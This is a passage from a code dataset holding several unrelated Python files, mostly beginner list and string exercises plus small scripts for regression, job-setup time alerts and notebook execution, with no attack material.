\\\n mx != list1[i]:\n secondmax = list1[i]\n elif mx == secondmax and \\\n secondmax != list1[i]:\n secondmax = list1[i]\n\nprint(\"Second highest number is : \",\\\n str(secondmax))\n\n\ndef Nmaxelements(list1, N):\n final_list = []\n\n for i in range(0, N):\n max1 = 0\n\n for j in range(len(list1)):\n if list1[j] > max1:\n max1 = list1[j]\n\n list1.remove(max1)\n final_list.append(max1)\n\n print(final_list)\n\n\nlist1 = [2, 6, 41, 85, 0, 3, 7, 6, 10]\nN = 2\n\nNmaxelements(list1, N)\n\nlist1 = [10, 21, 4, 45, 66, 93]\n\nfor num in list1:\n\n if num % 2 == 0:\n print(num, end=\" \")\n\nlist1 = [10, 21, 4, 45, 66, 93]\n\nfor num in list1:\n\n if num % 2 != 0:\n print(num, end=\" \")\n\nstart = int(input(\"Enter the start of range: \"))\nend = int(input(\"Enter the end of range: \"))\n\nfor num in range(start, end + 1):\n\n if num % 2 == 0:\n print(num, end=\" \")\n\nstart, end = 4, 19\n\nfor num in range(start, end + 1):\n\n if num % 2 != 0:\n print(num, end=\" \")\n\nlist1 = [11, -21, 0, 45, 66, -93]\n\nfor num in list1:\n\n if num >= 0:\n print(num, end=\" \")\n\nlist1 = [11, -21, 0, 45, 66, -93]\n\nfor num in list1:\n\n if num < 0:\n print(num, end=\" \")\n\nstart = int(input(\"Enter the start of range: \"))\nend = int(input(\"Enter the end of range: \"))\n\nfor num in range(start, end + 1):\n\n if num >= 0:\n print(num, end=\" \")\n\nlist1 = [11, 5, 17, 18, 23, 50]\n\nfor ele in list1:\n if ele % 2 == 0:\n list1.remove(ele)\n\nprint(\"New list after removing all even numbers: \", list1)\n\ntest_list = [5, 6, [], 3, [], [], 9]\n\nprint(\"The original list is : \" + str(test_list))\n\nres = [ele for ele in test_list if ele != []]\n\nprint(\"List after empty list removal : \" + str(res))\n\ntest_list = [12, 67, 98, 34]\n\nprint(\"The original list is : \" + str(test_list))\n\nres = []\nfor ele in test_list:\n sum = 0\n for digit in str(ele):\n sum += int(digit)\n res.append(sum)\n\nprint(\"List Integer Summation : \" + str(res))\n\n\ndef Repeat(x):\n _size = len(x)\n repeated = []\n for i in range(_size):\n k = i + 1\n for j in range(k, _size):\n if x[i] == x[j] and x[i] not in repeated:\n repeated.append(x[i])\n return repeated\n\n\nlist1 = [10, 20, 30, 20, 20, 30, 40, 50, -20, 60, 60, -20, -20]\nprint(Repeat(list1))\n\n\ndef Cumulative(lists):\n cu_list = []\n length = len(lists)\n cu_list = [sum(lists[0:x:1]) for x in range(0, length + 1)]\n return cu_list[1:]\n\n\nlists = [10, 20, 30, 40, 50]\nprint(Cumulative(lists))\n\nstring = \"geeks for geeks\"\nsubstring = \"geeks\"\n\ns = string.split()\n\nif substring in s:\n print(\"yes\")\nelse:\n print(\"no\")\n\nstring = \"Sam quiz practice code\"\ns = string.split()[::-1]\nl = []\nfor i in s:\n l.append(i)\nprint(\" \".join(l))\n\nlist1 = [1, 2, 3]\n\nprint(\"List1 before deleting is : \" + str(list1))\n\nlist1 *= 0\n\nprint(\"List1 after clearing using *= 0: \" + str(list1))\n\nlist1 = [1, 2, 3]\nlist2 = [5, 6, 7]\n\nprint(\"List1 before deleting is : \" + str(list1))\n\ndel list1[:]\nprint(\"List1 after clearing using del : \" + str(list1))\n\nprint(\"List2 before deleting is : \" + str(list2))\n\ndel list2[:]\nprint(\"List2 after clearing using del : \" + str(list2))\n\n# Program to add two matrices using nested loop\n\nX = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\nY = [[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n\nresult = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\nfor i in range(len(X)):\n for j in range(len(X[0])):\n result[i][j] = X[i][j] + Y[i][j]\n\nfor r in result:\n print(r)\n\nA = [[12, 7, 3], [4, 5, 6], [7, 8, 9]]\n\nB = [[5, 8, 1, 2], [6, 7, 
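# The "remove all even numbers" loop above mutates list1 while iterating over it,
# which skips the element after each removal; it only looks right because the even
# values in that list are not adjacent. A case where it visibly fails, plus the safe
# version:
nums = [2, 4, 5]
for n in nums:
    if n % 2 == 0:
        nums.remove(n)
print(nums)  # [4, 5] -- the 4 was skipped
print([n for n in [2, 4, 5] if n % 2 != 0])  # [5] -- a comprehension avoids the pitfall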
3, 0], [4, 5, 9, 1]]\n\nresult = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\n\nfor i in range(len(A)):\n\n for j in range(len(B[0])):\n\n for k in range(len(B)):\n result[i][j] += A[i][k] * B[k][j]\n\nfor r in result:\n print(r)\n\n\ndef prod(val):\n res = 1\n for ele in val:\n res *= ele\n return res\n\n\ntest_list = [[1, 4, 5], [7, 3], [4], [46, 7, 3]]\n\nprint(\"The original list : \" + str(test_list))\n\nres = prod([ele for sub in test_list for ele in sub])\n\nprint(\"The total element product in lists is : \" + str(res))\n\nn = \"This is a python language\"\ns = n.split(\" \")\nfor i in s:\n if len(i) % 2 == 0:\n print(i)\n\n\ndef check(string):\n\n string = string.lower()\n\n vowels = set(\"aeiou\")\n\n s = set({})\n\n for char in string:\n\n if char in vowels:\n s.add(char)\n else:\n pass\n\n if len(s) == len(vowels):\n print(\"Accepted\")\n else:\n print(\"Not Accepted\")\n\n\nif __name__ == \"__main__\":\n\n string = \"SEEquoiaL\"\n\n check(string)\n\n\ndef removeDuplicate(str):\n s = set(str)\n s = \"\".join(s)\n print(\"Without Order:\", s)\n t = \"\"\n for i in str:\n if (i in t):\n pass\n else:\n t = t + i\n print(\"With Order:\", t)\n\n\nstr = \"HellomynameisHello\"\nremoveDuplicate(str)\n\ntest_str = \"GeeksforGeeks\"\n\nprint(\"The original string is : \" + test_str)\n\nall_freq = {}\nfor i in test_str:\n if i in all_freq:\n all_freq[i] += 1\nelse:\n all_freq[i] = 1\nres = min(all_freq, key=all_freq.get)\n\nprint(\"The minimum of all characters in GeeksforGeeks is : \" + str(res))\n\ntest_str = \"GeeksforGeeks\"\n\nprint(\"The original string is : \" + test_str)\n\nall_freq = {}\nfor i in test_str:\n if i in all_freq:\n all_freq[i] += 1\nelse:\n all_freq[i] = 1\nres = max(all_freq, key=all_freq.get)\n\nprint(\"The maximum of all characters in GeeksforGeeks is : \" + str(res))\n\ninput_string = \"geeksforgeeks\"\ns1 = \"geeks\"\ns2 = \"abcd\"\ninput_string = input_string.replace(s1, s2)\nprint(input_string)\n\ntest_str = \"geeksforgeeks\"\ns1 = \"geeks\"\ns2 = \"abcd\"\n\ns = test_str.split(s1)\nnew_str = \"\"\n\nfor i in s:\n if (i == \"\"):\n new_str += s2\n else:\n new_str += i\n\nprint(new_str)\n\ntest_dict = {\n 'gfg': [5, 6, 7, 8],\n 'is': [10, 11, 7, 5],\n 'best': [6, 12, 10, 8],\n 'for': [1, 2, 5]\n}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = list(sorted({ele for val in test_dict.values() for ele in val}))\n\nprint(\"The unique values list is : \" + str(res))\n\n\ndef returnSum(myDict):\n\n list = []\n for i in myDict:\n list.append(myDict[i])\n final = sum(list)\n\n return final\n\n\ndict = {'a': 100, 'b': 200, 'c': 300}\nprint(\"Sum :\", returnSum(dict))\n\n\ndef Merge(dict1, dict2):\n return (dict2.update(dict1))\n\n\ndict1 = {'a': 10, 'b': 8}\ndict2 = {'d': 6, 'c': 4}\n\nprint(Merge(dict1, dict2))\n\nprint(dict2)\n\nimport sys\n\nTuple1 = (\"A\", 1, \"B\", 2, \"C\", 3)\nTuple2 = (\"Geek1\", \"Raju\", \"Geek2\", \"Nikhil\", \"Geek3\", \"Deepanshu\")\nTuple3 = ((1, \"Lion\"), (2, \"Tiger\"), (3, \"Fox\"), (4, \"Wolf\"))\n\nprint(\"Size of Tuple1: \" + str(sys.getsizeof(Tuple1)) + \"bytes\")\nprint(\"Size of Tuple2: \" + str(sys.getsizeof(Tuple2)) + \"bytes\")\nprint(\"Size of Tuple3: \" + str(sys.getsizeof(Tuple3)) + \"bytes\")\n\n\ndef split_string(string):\n\n list_string = string.split(' ')\n\n return list_string\n\n\ndef join_string(list_string):\n\n string = '-'.join(list_string)\n\n return string\n\n\nif __name__ == '__main__':\n string = 'Geeks for Geeks'\n\n list_string = split_string(string)\n print(list_string)\n\n new_string = 
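# In the two character-frequency blocks above, the `else` is indented under the `for`
# rather than the `if`, so it runs once after the loop and the dict ends up holding
# only the last character; min() and max() then both return 's'. Corrected counting:
test_str = "GeeksforGeeks"
all_freq = {}
for ch in test_str:
    all_freq[ch] = all_freq.get(ch, 0) + 1
print(min(all_freq, key=all_freq.get))  # 'f' -- least frequent (first of the ties)
print(max(all_freq, key=all_freq.get))  # 'e' -- most frequent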
join_string(list_string)\n print(new_string)\n\ns = 'Geeks for Geeks'\nprint(s.split(\" \"))\nprint(\"-\".join(s.split()))\n\ntest_str = 'Gfg is best . Gfg also has Classes now. \\\n\t\t\t\tClasses help understand better . '\n\nprint(\"The original string is : \" + str(test_str))\n\nrepl_dict = {'Gfg': 'It', 'Classes': 'They'}\n\ntest_list = test_str.split(' ')\nres = set()\nfor idx, ele in enumerate(test_list):\n if ele in repl_dict:\n if ele in res:\n test_list[idx] = repl_dict[ele]\n else:\n res.add(ele)\nres = ' '.join(test_list)\n\nprint(\"The string after replacing : \" + str(res))\n\ntest_str = 'It is the best thing ever for CS'\n\nprint(\"The original string is : \" + str(test_str))\n\nword_list = [\"best\", 'CS', 'for']\n\nrepl_wrd = 'gfg'\n\nres = ' '.join(\n [repl_wrd if idx in word_list else idx for idx in test_str.split()])\n\nprint(\"String after multiple replace : \" + str(res))\n\ntest_tup = (5, 20, 3, 7, 6, 8)\n\nprint(\"The original tuple is : \" + str(test_tup))\n\nK = 2\n\nres = []\ntest_tup = list(sorted(test_tup))\n\nfor idx, val in enumerate(test_tup):\n if idx < K or idx >= len(test_tup) - K:\n res.append(val)\nres = tuple(res)\n\nprint(\"The extracted values : \" + str(res))\n\ntest_tuple1 = (4, 5)\ntest_tuple2 = (7, 8)\n\nprint(\"The original tuple 1 : \" + str(test_tuple1))\nprint(\"The original tuple 2 : \" + str(test_tuple2))\n\nres = [(a, b) for a in test_tuple1 for b in test_tuple2]\nres = res + [(a, b) for a in test_tuple2 for b in test_tuple1]\n\nprint(\"The filtered tuple : \" + str(res))\n\ntest_dict = {\"Arushi\": 22, \"Anuradha\": 21, \"Mani\": 21, \"Haritha\": 21}\n\nprint(\"The dictionary before performing remove is : \" + str(test_dict))\n\nremoved_value = test_dict.pop('Mani')\n\nprint(\"The dictionary after remove is : \" + str(test_dict))\nprint(\"The removed key's value is : \" + str(removed_value))\n\nprint('\\r')\n\nremoved_value = test_dict.pop('Manjeet', 'No Key found')\n\nprint(\"The dictionary after remove is : \" + str(test_dict))\nprint(\"The removed key's value is : \" + str(removed_value))\n\n\ndef swapPositions(list, pos1, pos2):\n\n list[pos1], list[pos2] = list[pos2], list[pos1]\n return list\n\n\nList = [23, 65, 19, 90]\npos1, pos2 = 1, 3\n\nprint(swapPositions(List, pos1 - 1, pos2 - 1))\n\ntest_dict = {'gfg': [7, 6, 3], 'is': [2, 10, 3], 'best': [19, 4]}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = dict()\nfor key in sorted(test_dict):\n res[key] = sorted(test_dict[key])\n\nprint(\"The sorted dictionary : \" + str(res))\n\n\ndef reverse_list(arr):\n left = 0\n right = len(arr) - 1\n while (left < right):\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n left += 1\n right -= 1\n\n return arr\n\n\narr = [1, 2, 3, 4, 5, 6, 7]\nprint(reverse_list(arr))\n\n\ndef search(arr, x):\n\n for i in range(len(arr)):\n\n if arr[i] == x:\n return i\n\n return -1\n\n\ndef selectionSort(array, size):\n\n for ind in range(size):\n min_index = ind\n\n for j in range(ind + 1, size):\n if array[j] < array[min_index]:\n min_index = j\n (array[ind], array[min_index]) = (array[min_index], array[ind])\n\n\narr = [-2, 45, 0, 11, -9, 88, -97, -202, 747]\nsize = len(arr)\nselectionSort(arr, size)\nprint('The array after sorting in Ascending Order by selection sort is:')\nprint(arr)\n\n\ndef bubbleSort(arr):\n n = len(arr)\n swapped = False\n for i in range(n - 1):\n for j in range(0, n - i - 1):\n\n if arr[j] > arr[j + 1]:\n swapped = True\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n if not swapped:\n return\n\n\narr = 
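# bubbleSort above initializes `swapped` once, outside the passes, so the early exit
# can only trigger when the input is already sorted; resetting the flag on every pass
# restores the intended optimization:
def bubble_sort_early_exit(arr):
    n = len(arr)
    for i in range(n - 1):
        swapped = False
        for j in range(n - i - 1):
            if arr[j] > arr[j + 1]:
                arr[j], arr[j + 1] = arr[j + 1], arr[j]
                swapped = True
        if not swapped:
            return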
[64, 34, 25, 12, 22, 11, 90]\n\nbubbleSort(arr)\n\nprint(\"Sorted array is:\")\nfor i in range(len(arr)):\n print(\"% d\" % arr[i], end=\" \")\n\nfrom datetime import datetime\n\nnow_method = datetime.now()\n\ncurrentTime = now_method.strftime(\"%H:%M:%S\")\nprint(\"Current Time =\", currentTime)\n\n# Python program for implementation of MergeSort\n\n# Merges two subarrays of arr[].\n# First subarray is arr[l..m]\n# Second subarray is arr[m+1..r]\n\n\ndef merge(arr, l, m, r):\n\tn1 = m - l + 1\n\tn2 = r - m\n\n\t# create temp arrays\n\tL = [0] * (n1)\n\tR = [0] * (n2)\n\n\t# Copy data to temp arrays L[] and R[]\n\tfor i in range(0, n1):\n\t\tL[i] = arr[l + i]\n\n\tfor j in range(0, n2):\n\t\tR[j] = arr[m + 1 + j]\n\n\t# Merge the temp arrays back into arr[l..r]\n\ti = 0\t # Initial index of first subarray\n\tj = 0\t # Initial index of second subarray\n\tk = l\t # Initial index of merged subarray\n\n\twhile i < n1 and j < n2:\n\t\tif L[i] <= R[j]:\n\t\t\tarr[k] = L[i]\n\t\t\ti += 1\n\t\telse:\n\t\t\tarr[k] = R[j]\n\t\t\tj += 1\n\t\tk += 1\n\n\t# Copy the remaining elements of L[], if there\n\t# are any\n\twhile i < n1:\n\t\tarr[k] = L[i]\n\t\ti += 1\n\t\tk += 1\n\n\twhile j < n2:\n\t\tarr[k] = R[j]\n\t\tj += 1\n\t\tk += 1\n\ndef mergeSort(arr, l, r):\n\tif l < r:\n\t\tm = l+(r-l)//2\n\n\t\tmergeSort(arr, l, m)\n\t\tmergeSort(arr, m+1, r)\n\t\tmerge(arr, l, m, r)\n\n\narr = [12, 11, 13, 5, 6, 7]\nn = len(arr)\nprint(\"Given array is\")\nfor i in range(n):\n\tprint(\"%d\" % arr[i],end=\" \")\n\nmergeSort(arr, 0, n-1)\nprint(\"\\n\\nSorted array is\")\nfor i in range(n):\n\tprint(\"%d\" % arr[i],end=\" \")\n\ndef Pattern(line):\n\tpat=\"\"\n\tfor i in range(0,line):\n\t\tfor j in range(0,line):\t\n\t\t\tif ((j == 1 and i != 0 and i != line-1) or ((i == 0 or\n\t\t\t\ti == line-1) and j > 1 and j < line-2) or (i == ((line-1)/2)\n\t\t\t\tand j > line-5 and j < line-1) or (j == line-2 and\n\t\t\t\ti != 0 and i != line-1 and i >=((line-1)/2))):\n\t\t\t\tpat=pat+\"*\"\n\t\t\telse:\t\n\t\t\t\tpat=pat+\" \"\n\t\tpat=pat+\"\\n\"\n\treturn pat\n\nline = 7\nprint(Pattern(line))\n\n\n\ndef Find(string):\n\tx=string.split()\n\tres=[]\n\tfor i in x:\n\t\tif i.startswith(\"https:\") or i.startswith(\"http:\"):\n\t\t\tres.append(i)\n\treturn res\n\t\t\t\nstring = 'My Profile: https://auth.geeksforgeeks.org/user/Chinmoy%20Lenka/articles in the portal of https://www.geeksforgeeks.org/'\nprint(\"Urls: \", Find(string))\n","repo_name":"SyedSibtainRazvi/Python-Basics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"429990089","text":"import sys\ninput = sys.stdin.readline\n\ndef solution(N, M, arr):\n answer = 1\n for row in range(N):\n for col in range(M):\n limit = N-row if N-row < M-col else M-col\n for size in range(1, limit):\n if arr[row][col] == arr[row+size][col] == arr[row][col+size] == arr[row+size][col+size]:\n answer = max(answer, (size+1)**2)\n\n return answer\n \nif __name__ == '__main__':\n N, M = map(int, input().split())\n arr = [input() for _ in range(N)]\n result = solution(N, M, arr)\n print(result)\n","repo_name":"worldbrighteststar/Boostcamp_2st_Hot6","sub_path":"Algorithm/SEONGWON/1051.py","file_name":"1051.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73170233154","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 11:30:50 
2020\n\n@author: JBriggs\n\"\"\"\n\nimport pandas as pd\nimport send_email as email\nimport time\nimport pyodbc as db\n\nwippath = \"G:\\\\3 - Production Departments\\\\4 - Grinding\\\\0 - Department Documents\\\\4 - Programs & Software\\\\1 - Operating Software\\\\Setup_Tracker\\\\Data\\\\setups_in_progress.csv\"\nlatepath = \".\\\\latewip.csv\"\nwarnpath = \".\\\\warnwip.csv\"\ntwohourpath = \".\\\\twohoursetup.csv\"\n\njoe = 'jbriggs@catiglass.com;'\npenny = 'penny.quandt@catiglass.com;'\nslawek = 'slawek@catiglass.com;'\nsend_to = joe\njoephone = '8159006943@txt.att.net'\ntext_to = joephone\n\ndef getJobData(jobnum):\n jobnum = \"'\" + jobnum.upper() + \"'\" \n with open('sql_access.txt', 'r') as file:\n access = file.readlines()\n \n\n job_data = {}\n conn = db.connect('Driver={SQL Server};'\n 'Server=SVR-APP\\\\SQLEXPRESS;'\n + access[0] +\n 'Trusted_Connect=yes;')\n \n command = (\"SELECT Parts.CustName, Parts.CustPartNum \"\n \"FROM QssCatiJobTrack.dbo.Jobs, QssCatiJobTrack.dbo.Parts \"\n \"WHERE Jobs.JobNum LIKE \" + jobnum + \" \"\n \"AND Jobs.PartID = Parts.PartID \") \n \n cursor = conn.cursor()\n \n cursor.execute(command)\n \n for row in cursor:\n job_data[jobnum] = [row[0],row[1]]\n cursor.close()\n conn.close()\n return job_data\n\ndef formatMessage(jlist,machine,et,operator):\n #this returns a string containing dict data in a more human readable format\n msg = \"\"\n \n for k in sorted(jlist):\n job = k.strip(\"'\")\n cust = jlist[k][0]\n p_num = jlist[k][1] \n msg = (\"Job \" + job + \" for \" + cust + \", part # \" + p_num + \n \" at \" + machine + \" is currently at \" + str(et) + \" elapsed time. Tech is \" + operator + \".\")\n return msg\n\ndef checkWip():\n wip = pd.read_csv(wippath)\n now = pd.Timestamp.now()\n wip['timestamp'] = wip['Start Date'].astype(str) + \"T\" + wip['Start Time'].astype(str) \n wip['timestamp'] = pd.to_datetime(wip['timestamp']) \n wip['elapsed'] = now - wip['timestamp']\n warning = wip.elapsed.dt.total_seconds() >= 2700\n overtime = wip.elapsed.dt.total_seconds() > 3600\n two_hours = wip.elapsed.dt.total_seconds() > 7200\n \n return wip[overtime], wip[warning], wip[two_hours]\n\n\ndef manageOT():\n late_wip, warn_wip, two_hours = checkWip()\n \n column_names = ['Job Number','Machine','Setup Tech','Start Date','Start Time','timestamp','elapsed']\n \n while True:\n try:\n prev_late = pd.read_csv(latepath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('latewip.csv')\n continue\n \n try:\n prev_warn = pd.read_csv(warnpath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('warnwip.csv')\n continue\n \n try:\n two_late = pd.read_csv(twohourpath)\n except FileNotFoundError as fnf:\n print(fnf, 'Creating missing file.')\n df = pd.DataFrame(columns = column_names)\n df.to_csv('twohoursetup.csv')\n continue\n break\n \n late_wip.to_csv('latewip.csv', index=False)\n warn_wip.to_csv('warnwip.csv', index=False)\n two_hours.to_csv('twohoursetup.csv', index=False)\n \n jac = prev_late['Job Number'].unique().astype(str)\n wjac = prev_warn['Job Number'].unique().astype(str)\n tjac = two_late['Job Number'].unique().astype(str)\n \n for row in late_wip.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in jac: \n # need to send email\n subject = 'Grinding setup over 1 hour: 
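# checkWip() above builds a timestamp by string-concatenating the date and time
# columns and then thresholds on Timedelta seconds; the same masks in a
# self-contained form (column names match the CSV above, the sample rows are made up):
import pandas as pd

wip = pd.DataFrame({"Start Date": ["2020-03-17", "2020-03-17"],
                    "Start Time": ["08:00:00", "09:10:00"]})
now = pd.Timestamp("2020-03-17 10:00:00")
wip["timestamp"] = pd.to_datetime(wip["Start Date"] + "T" + wip["Start Time"])
wip["elapsed"] = now - wip["timestamp"]
print(wip[wip.elapsed.dt.total_seconds() >= 2700])  # 45-minute warning (both rows)
print(wip[wip.elapsed.dt.total_seconds() > 3600])   # over one hour (first row only)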
Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n for row in warn_wip.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in wjac: \n # need to send email\n subject = 'Grinding setup 45 minutes warning: Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n for row in two_hours.itertuples(index=False):\n jobnum = str(getattr(row, '_0')) \n machine = getattr(row, 'Machine')\n operator = getattr(row, '_2')\n et = getattr(row,'elapsed')\n if jobnum not in tjac: \n # need to send email\n subject = 'Grinding setup over 2 hours: Job # ' + jobnum\n job_list = getJobData(jobnum)\n msg = formatMessage(job_list,machine,et,operator)\n email.mailMessage(send_to, subject, msg)\n email.txtMessage(text_to, subject, msg)\n \n \n \nif __name__ == \"__main__\":\n while True:\n checkWip()\n manageOT()\n time.sleep(10)","repo_name":"jcbriggsjr/Time_Monitor","sub_path":"time_monitor.py","file_name":"time_monitor.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"244468794","text":"\"\"\"\nThis example uses the kernel regression model to approximate\nthe third degree polynomial in toy_data.py\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\n\nfrom regression.kernel_regression.data.toy_data import third_degree_poly_with_noise\nfrom regression.kernel_regression.models.gaussian_kernel import predict\n\nnp.random.seed(101)\n\n# settings\nimages_path = '../generated_figures/'\n\n# Get data\nx_train = np.linspace(start=-2, stop=5, num=20).reshape((-1, 1))\ny_train = third_degree_poly_with_noise(x_train, 7)\n\nx_test = np.linspace(start=-1.00, stop=5, num=10).reshape((-1, 1))\ny_test = third_degree_poly_with_noise(x_test, 7).reshape((-1, 1))\n\n# Predict value for test data and computes MSE\ny_predicted = predict(x_test, x_train, y_train, 0.25)\nmse = mean_squared_error(y_test, y_predicted)\n\n# Plot Ground Truth and Predicted\nfig, ax = plt.subplots(figsize=(8, 5))\nax.plot(x_test, y_test, label='Ground Truth')\nax.plot(x_test, y_predicted, label='Predicted')\nax.set_xlabel('Input (x)')\nax.set_ylabel('Ground Truth and Predicted Output')\nax.set_title('Ground Truth vs Predicted\\nMSE ={0:.2f}'.format(mse))\nax.legend()\nfig.savefig(images_path + 'toy_third_degree_polynomial_predicted_vs_ground_truth.png')\nplt.show()\n","repo_name":"kylinmb/Data_Analysis_Sandbox","sub_path":"regression/kernel_regression/examples/toy_third_degree_polynomial.py","file_name":"toy_third_degree_polynomial.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3344075032","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.style\nplt.style.use(\"ggplot\")\ninput_data=list(range(1,24))\noutput_data=[2303,2554,2720,3865,2962,3552,3379,3370,3099,4370,3619,3610,3700,3880,3760,4874,4975,4713,5821,4680,3435,6088,6654]\n\nx=np.array(input_data)\ny=np.array(output_data)\n\ntheta_0=2000\ntheta_1=100\nalpha=0.01\nm=float(len(input_data))\nepochs=10000\n\nfor i in 
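# The kernel-regression example above imports predict() from a local
# models.gaussian_kernel module that is not shown; a plausible Nadaraya-Watson
# version, for reference only (the real module may differ):
import numpy as np

def nw_predict(x_test, x_train, y_train, bandwidth):
    """Gaussian-kernel weighted average of y_train at each test point."""
    d2 = (x_test - x_train.T) ** 2              # (n_test, n_train) squared distances
    w = np.exp(-d2 / (2.0 * bandwidth ** 2))    # Gaussian kernel weights
    return (w @ y_train.reshape(-1, 1)) / w.sum(axis=1, keepdims=True)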
range(epochs):\n prediction=theta_0+(theta_1*x)\n diff_0=(sum(output_data-prediction))/(-m)\n diff_1=(sum((output_data-prediction)*x))/(-m)\n theta_0=theta_0-(alpha*diff_0)\n theta_1=theta_1-(alpha*diff_1)\nfinal_fit=theta_0+(theta_1*x)\n\nprint(\"Parameters used were: \",theta_0,theta_1)\n\nprint(\"May 24:\",round(theta_0+(theta_1*24)))\n\n\nplt.scatter(x,y,color=\"#007788\",label=\"Cases\")\nplt.plot([min(x),max(x)],[min(final_fit),max(final_fit)],color=\"#CC2A49\",label=\"Regression Line\")\nplt.title(\"COVID-19 Analysis (May,2020)\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"No of Cases\")\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n","repo_name":"iSriBalaji/MachineLearning","sub_path":"Linear Regression/Single_Var/Covid_Analysis_LinearRegression.py","file_name":"Covid_Analysis_LinearRegression.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13347886504","text":"# -*- encoding: utf-8 -*-\nimport json\nimport codecs\n\n\ndef ipy_notebook_exec(path, save_and_norun=None):\n notebook = json.load(codecs.open(path, \"r\", \"utf-8\"))\n program = ''\n for block in ipy_code_blocks(notebook):\n for line in ipy_valid_lines(block):\n if \"h2o.init\" not in line:\n program += line if '\\n' in line else line + '\\n'\n if save_and_norun is not None:\n with open(save_and_norun, \"w\") as f: f.write(program)\n else:\n exec(program, dict(__name__='main'))\n\ndef ipy_blocks(notebook):\n if 'worksheets' in list(notebook.keys()):\n return notebook['worksheets'][0]['cells'] # just take the first worksheet\n elif 'cells' in list(notebook.keys()):\n return notebook['cells']\n else:\n raise NotImplementedError(\"ipython notebook cell/block json format not handled\")\n\ndef ipy_code_blocks(notebook):\n return [cell for cell in ipy_blocks(notebook) if cell['cell_type'] == 'code']\n\ndef ipy_lines(block):\n if 'source' in list(block.keys()):\n return block['source']\n elif 'input' in list(block.keys()):\n return block['input']\n else:\n raise NotImplementedError(\"ipython notebook source/line json format not handled\")\n\ndef ipy_valid_lines(block):\n lines = ipy_lines(block)\n\n # matplotlib handling\n for line in lines:\n if \"import matplotlib.pyplot as plt\" in line or \"%matplotlib inline\" in line:\n import matplotlib\n matplotlib.use('Agg', warn=False)\n\n # remove ipython magic functions\n lines = [line for line in lines if not line.startswith('%')]\n\n # don't show any plots\n lines = [line for line in lines if \"plt.show()\" not in line]\n\n return lines\n\ndef pydemo_exec(test_name):\n with open(test_name, \"r\") as t: demo = t.read()\n program = ''\n for line in demo.split('\\n'):\n if \"h2o.init\" not in line:\n program += line if '\\n' in line else line + '\\n'\n demo_c = compile(program, '', 'exec')\n exec(demo_c, dict(__name__='main'))\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/pydemo_utils/utilsPY.py","file_name":"utilsPY.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"18600167989","text":"import re\n\n\ndef solution(str1, str2):\n answer = 0\n str1 = str1.upper()\n str2 = str2.upper()\n str1_list = []\n str2_list = []\n\n for i in range(len(str1) - 1):\n temp = str1[i:i + 2]\n if temp.isalpha() == True:\n str1_list.append(temp)\n\n for i in range(len(str2) - 1):\n temp = str2[i:i + 2]\n if temp.isalpha() == True:\n str2_list.append(temp)\n\n intersection = 
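# A quick closed-form cross-check of the gradient-descent fit above: ordinary least
# squares via np.polyfit should land on nearly the same line:
import numpy as np

x = np.arange(1, 24)
y = np.array([2303, 2554, 2720, 3865, 2962, 3552, 3379, 3370, 3099, 4370, 3619, 3610,
              3700, 3880, 3760, 4874, 4975, 4713, 5821, 4680, 3435, 6088, 6654])
theta_1, theta_0 = np.polyfit(x, y, 1)  # slope, intercept
print(theta_0, theta_1)
print(round(theta_0 + theta_1 * 24))    # OLS prediction for May 24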
